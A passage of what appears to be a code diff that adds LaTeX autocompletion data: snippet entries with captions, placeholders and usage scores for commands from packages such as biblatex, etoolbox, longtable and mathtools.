0.018615449342361392, + }, + ], + algorithm: [ + { + caption: '\\listalgorithmname', + snippet: '\\listalgorithmname', + meta: 'algorithm-cmd', + score: 0.00022490402516652368, + }, + { + caption: '\\listofalgorithms', + snippet: '\\listofalgorithms', + meta: 'algorithm-cmd', + score: 0.0012576983422794912, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algorithm-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algorithm-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algorithm-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algorithm-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algorithm-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algorithm-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\listof{}{}', + snippet: '\\listof{$1}{$2}', + meta: 'algorithm-cmd', + score: 0.0009837365348002915, + }, + { + caption: '\\floatplacement{}{}', + snippet: '\\floatplacement{$1}{$2}', + meta: 'algorithm-cmd', + score: 0.0005815474978918903, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'algorithm-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatstyle{}', + snippet: '\\floatstyle{$1}', + meta: 'algorithm-cmd', + score: 0.0015470917047414941, + }, + { + caption: '\\floatname{}{}', + snippet: '\\floatname{$1}{$2}', + meta: 'algorithm-cmd', + score: 0.0011934321931750752, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algorithm-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'algorithm-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\newfloat{}{}{}', + snippet: '\\newfloat{$1}{$2}{$3}', + meta: 'algorithm-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat', + snippet: '\\newfloat', + meta: 'algorithm-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat{}', + snippet: '\\newfloat{$1}', + meta: 'algorithm-cmd', + score: 0.0012745874472536625, + }, + ], + biblatex: [ + { + caption: '\\textcite{}', + snippet: '\\textcite{$1}', + meta: 'biblatex-cmd', + score: 0.0071363824748767206, + }, + { + caption: '\\iffieldundef{}{}{}', + snippet: '\\iffieldundef{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\list{}{}', + snippet: '\\list{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00046570666700199663, + }, + { + caption: '\\list{}', + snippet: '\\list{$1}', + meta: 'biblatex-cmd', + score: 0.00046570666700199663, + }, + { + caption: '\\list', + snippet: '\\list', + meta: 'biblatex-cmd', + score: 0.00046570666700199663, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\printbibliography', + snippet: '\\printbibliography', + meta: 'biblatex-cmd', + score: 0.028923378512954446, + }, + { + caption: '\\printbibliography[]', + snippet: '\\printbibliography[$1]', + meta: 'biblatex-cmd', + score: 0.028923378512954446, + }, + { + caption: '\\keyword{}', + snippet: '\\keyword{$1}', + meta: 'biblatex-cmd', + score: 
0.0056978719547823445, + }, + { + caption: '\\nocite{}', + snippet: '\\nocite{$1}', + meta: 'biblatex-cmd', + score: 0.04990693820960752, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'biblatex-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\mkbibquote{}', + snippet: '\\mkbibquote{$1}', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\addabbrvspace', + snippet: '\\addabbrvspace', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\AtEveryBibitem{}', + snippet: '\\AtEveryBibitem{$1}', + meta: 'biblatex-cmd', + score: 0.0006862523808353773, + }, + { + caption: '\\mkbibemph{}', + snippet: '\\mkbibemph{$1}', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\DeclareFieldFormat{}{}', + snippet: '\\DeclareFieldFormat{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00028207109055618685, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'biblatex-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\enquote{}', + snippet: '\\enquote{$1}', + meta: 'biblatex-cmd', + score: 0.0077432730806830915, + }, + { + caption: '\\bibopenbracket', + snippet: '\\bibopenbracket', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\newbibmacro{}[]{}', + snippet: '\\newbibmacro{$1}[$2]{$3}', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\addbibresource{}', + snippet: '\\addbibresource{$1}', + meta: 'biblatex-cmd', + score: 0.033545778388159704, + }, + { + caption: '\\defbibheading{}{}', + snippet: '\\defbibheading{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00013423526504458629, + }, + { + caption: '\\DeclareNameAlias{}{}', + snippet: '\\DeclareNameAlias{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.0003596306478652252, + }, + { + caption: '\\bibcloseparen', + snippet: '\\bibcloseparen', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\renewbibmacro{}{}', + snippet: '\\renewbibmacro{$1}{$2}', + meta: 'biblatex-cmd', + score: 9.70299207241043e-5, + }, + { + caption: '\\bibclosebracket', + snippet: '\\bibclosebracket', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'biblatex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'biblatex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\parentext', + snippet: '\\parentext', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'biblatex-cmd', + score: 2.341195220791228, + }, + { + caption: '\\addspace', + snippet: '\\addspace', + meta: 'biblatex-cmd', + score: 0.0002657609533376918, + }, + { + caption: '\\ifentrytype{}{}{}', + snippet: '\\ifentrytype{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 8.342875497183237e-5, + }, + { + caption: '\\addslash', + snippet: '\\addslash', + meta: 'biblatex-cmd', + score: 0.0002657609533376918, + }, + { + caption: '\\DefineBibliographyStrings{}{}', + snippet: '\\DefineBibliographyStrings{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.001537977148659816, + }, + { + caption: '\\section{}', + snippet: '\\section{$1}', + meta: 'biblatex-cmd', + score: 3.0952612541683835, + }, + { + caption: '\\newblockpunct', + snippet: '\\newblockpunct', + meta: 'biblatex-cmd', + score: 0.0001328804766688459, + }, + { + caption: '\\defbibfilter{}{}', + snippet: '\\defbibfilter{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.0005203319717980072, + }, + 
{ + caption: '\\parencite{}', + snippet: '\\parencite{$1}', + meta: 'biblatex-cmd', + score: 0.0447747090014577, + }, + { + caption: '\\parencite[]{}', + snippet: '\\parencite[$1]{$2}', + meta: 'biblatex-cmd', + score: 0.0447747090014577, + }, + { + caption: '\\midsentence', + snippet: '\\midsentence', + meta: 'biblatex-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'biblatex-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\DeclareSourcemap{}', + snippet: '\\DeclareSourcemap{$1}', + meta: 'biblatex-cmd', + score: 0.0005203319717980072, + }, + { + caption: '\\AtBeginBibliography{}', + snippet: '\\AtBeginBibliography{$1}', + meta: 'biblatex-cmd', + score: 0.0004668773504581073, + }, + { + caption: '\\AtEveryCite{}', + snippet: '\\AtEveryCite{$1}', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\DeclareLanguageMapping{}{}', + snippet: '\\DeclareLanguageMapping{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.000703956971675325, + }, + { + caption: '\\addtocategory{}{}', + snippet: '\\addtocategory{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.008238589553468446, + }, + { + caption: '\\DeclareBibliographyCategory{}', + snippet: '\\DeclareBibliographyCategory{$1}', + meta: 'biblatex-cmd', + score: 0.0010298236941835557, + }, + { + caption: '\\break', + snippet: '\\break', + meta: 'biblatex-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\break{}', + snippet: '\\break{$1}', + meta: 'biblatex-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\break{}{}', + snippet: '\\break{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.016352452390960115, + }, + { + caption: '\\bibopenparen', + snippet: '\\bibopenparen', + meta: 'biblatex-cmd', + score: 0.0005125772067631753, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\name{}{}', + snippet: '\\name{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.1236289144754329, + }, + { + caption: '\\name', + snippet: '\\name', + meta: 'biblatex-cmd', + score: 0.1236289144754329, + }, + { + caption: '\\name{}', + snippet: '\\name{$1}', + meta: 'biblatex-cmd', + score: 0.1236289144754329, + }, + { + caption: '\\ExecuteBibliographyOptions{}', + snippet: '\\ExecuteBibliographyOptions{$1}', + meta: 'biblatex-cmd', + score: 4.841482597532878e-5, + }, + { + caption: '\\usebibmacro{}{}', + snippet: '\\usebibmacro{$1}{$2}', + meta: 'biblatex-cmd', + score: 9.682965195065755e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'biblatex-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'biblatex-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'biblatex-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'biblatex-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'biblatex-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'biblatex-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'biblatex-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 
'biblatex-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'biblatex-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'biblatex-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'biblatex-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'biblatex-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'biblatex-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'biblatex-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'biblatex-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'biblatex-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'biblatex-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'biblatex-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'biblatex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'biblatex-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'biblatex-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'biblatex-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'biblatex-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'biblatex-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'biblatex-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'biblatex-cmd', + score: 0.00041307691354437894, + }, + { + caption: 
'\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'biblatex-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'biblatex-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'biblatex-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'biblatex-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'biblatex-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'biblatex-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'biblatex-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'biblatex-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'biblatex-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'biblatex-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'biblatex-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'biblatex-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'biblatex-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'biblatex-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-cmd', + score: 0.008565354665444157, + }, + ], + microtype: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'microtype-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'microtype-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'microtype-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\lsstyle', + snippet: '\\lsstyle', + meta: 'microtype-cmd', + score: 0.0023367519914345774, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'microtype-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\DisableLigatures[]{}', + snippet: '\\DisableLigatures[$1]{$2}', + meta: 'microtype-cmd', + score: 0.0009805246614299932, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'microtype-cmd', + score: 0.00037306820619479756, + }, + ], + etoolbox: [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'etoolbox-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'etoolbox-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'etoolbox-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'etoolbox-cmd', + score: 
0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'etoolbox-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'etoolbox-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'etoolbox-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'etoolbox-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'etoolbox-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'etoolbox-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'etoolbox-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'etoolbox-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'etoolbox-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'etoolbox-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'etoolbox-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'etoolbox-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'etoolbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'etoolbox-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'etoolbox-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'etoolbox-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'etoolbox-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'etoolbox-cmd', + score: 0.008565354665444157, + }, + ], + longtable: [ + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'longtable-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'longtable-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'longtable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'longtable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'longtable-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'longtable-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'longtable-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'longtable-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'longtable-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'longtable-cmd', + score: 0.0313525090421608, + }, 
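// ---------------------------------------------------------------------
// [Editor's note: illustrative sketch only, not part of this commit.]
// The `score` field is a ranking weight: several packages contribute
// the same command (e.g. \csname and \expandafter appear under many
// packages above), so a consumer would plausibly merge the arrays for
// the packages a document loads, de-duplicate by caption, and sort by
// descending score. A minimal, assumed merger (`rankCompletions` is
// hypothetical, not from this file):
function rankCompletions(packages, loadedPackages) {
  const best = new Map();
  for (const name of loadedPackages) {
    for (const entry of packages[name] ?? []) {
      const prev = best.get(entry.caption);
      // Keep only the highest-scoring entry per caption.
      if (!prev || entry.score > prev.score) best.set(entry.caption, entry);
    }
  }
  return [...best.values()].sort((a, b) => b.score - a.score);
}
// ---------------------------------------------------------------------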
+ ], + mathtools: [ + { + caption: '\\xleftrightarrow[][]{}', + snippet: '\\xleftrightarrow[$1][$2]{$3}', + meta: 'mathtools-cmd', + score: 4.015559489911509e-5, + }, + { + caption: '\\vcentcolon', + snippet: '\\vcentcolon', + meta: 'mathtools-cmd', + score: 0.00021361943526711615, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'mathtools-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\coloneqq', + snippet: '\\coloneqq', + meta: 'mathtools-cmd', + score: 0.0014407293323958122, + }, + { + caption: '\\mathclap{}', + snippet: '\\mathclap{$1}', + meta: 'mathtools-cmd', + score: 7.84378567451772e-5, + }, + { + caption: '\\adjustlimits', + snippet: '\\adjustlimits', + meta: 'mathtools-cmd', + score: 0.0005307066890271085, + }, + { + caption: '\\MoveEqLeft', + snippet: '\\MoveEqLeft', + meta: 'mathtools-cmd', + score: 5.343949980628182e-5, + }, + { + caption: '\\mathrlap{}', + snippet: '\\mathrlap{$1}', + meta: 'mathtools-cmd', + score: 0.0003112817211637952, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'mathtools-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\xhookrightarrow{}', + snippet: '\\xhookrightarrow{$1}', + meta: 'mathtools-cmd', + score: 5.444260823474129e-5, + }, + { + caption: '\\DeclarePairedDelimiter{}{}{}', + snippet: '\\DeclarePairedDelimiter{$1}{$2}{$3}', + meta: 'mathtools-cmd', + score: 0.0033916678416372487, + }, + { + caption: '\\DeclarePairedDelimiter', + snippet: '\\DeclarePairedDelimiter', + meta: 'mathtools-cmd', + score: 0.0033916678416372487, + }, + { + caption: '\\prescript{}{}{}', + snippet: '\\prescript{$1}{$2}{$3}', + meta: 'mathtools-cmd', + score: 8.833369785705982e-6, + }, + { + caption: '\\underbrace{}', + snippet: '\\underbrace{$1}', + meta: 'mathtools-cmd', + score: 0.010373780436850907, + }, + { + caption: '\\mathllap{}', + snippet: '\\mathllap{$1}', + meta: 'mathtools-cmd', + score: 3.140504277052775e-5, + }, + { + caption: '\\overbrace{}', + snippet: '\\overbrace{$1}', + meta: 'mathtools-cmd', + score: 0.0006045704778718376, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'mathtools-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'mathtools-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'mathtools-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'mathtools-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mathtools-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mathtools-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'mathtools-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'mathtools-cmd', + score: 
0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'mathtools-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mathtools-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mathtools-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'mathtools-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'mathtools-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'mathtools-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'mathtools-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'mathtools-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'mathtools-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'mathtools-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'mathtools-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'mathtools-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'mathtools-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'mathtools-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'mathtools-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'mathtools-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'mathtools-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'mathtools-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'mathtools-cmd', + score: 0.0011508785476242003, + }, + { + caption: 